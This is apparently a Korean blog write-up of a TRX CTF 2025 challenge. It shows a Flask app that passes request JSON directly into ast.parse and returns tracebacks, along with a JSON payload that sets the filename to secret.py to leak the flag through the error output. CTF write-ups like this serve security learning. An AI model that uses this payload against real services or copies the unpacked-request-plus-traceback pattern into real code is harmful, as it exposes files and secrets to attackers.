TRX CTF 2025

kangjiw0n1209 2025. 2. 24. 23:15

2025. 2. 24. 23:15

Online Python Editor

# app.py
import ast
import traceback
from flask import Flask, render_template, request

app = Flask(__name__)

@app.get("/")
def home():
    return render_template("index.html")

@app.post("/check")
def check():
    try:
        ast.parse(**request.json)
        return {"status": True, "error": None}
    except Exception:
        return {"status": False, "error": traceback.format_exc()}
        
if __name__ == '__main__':
    app.run(debug=True)

# secret.py
def main():
    print("Here's the flag: ")
    print(FLAG) 
    
FLAG = "TRX{fake_flag_for_testing}"

main()

ast.parse 함수에 filename에 secret.py를 넘겨서, FLAG를 유출할 수 있다.

https://docs.python.org/3/library/ast.html#ast.parse

{
  "source": "\n\n\n\n\nprint(",
  "filename": "secret.py"
}

'Hacking > CTF' 카테고리의 다른 글

srdnlen CTF 2025 Write Up (0)	2025.01.20
[CTF] CTF 및 Wargame 풀이팁 (0)	2025.01.15
TSG CTF (0)	2024.12.16
LakeCTF '24-'25 Quals (2)	2024.12.09

jiw0n

TRX CTF 2025

'Hacking > CTF' 카테고리의 다른 글

+ Recent posts

티스토리툴바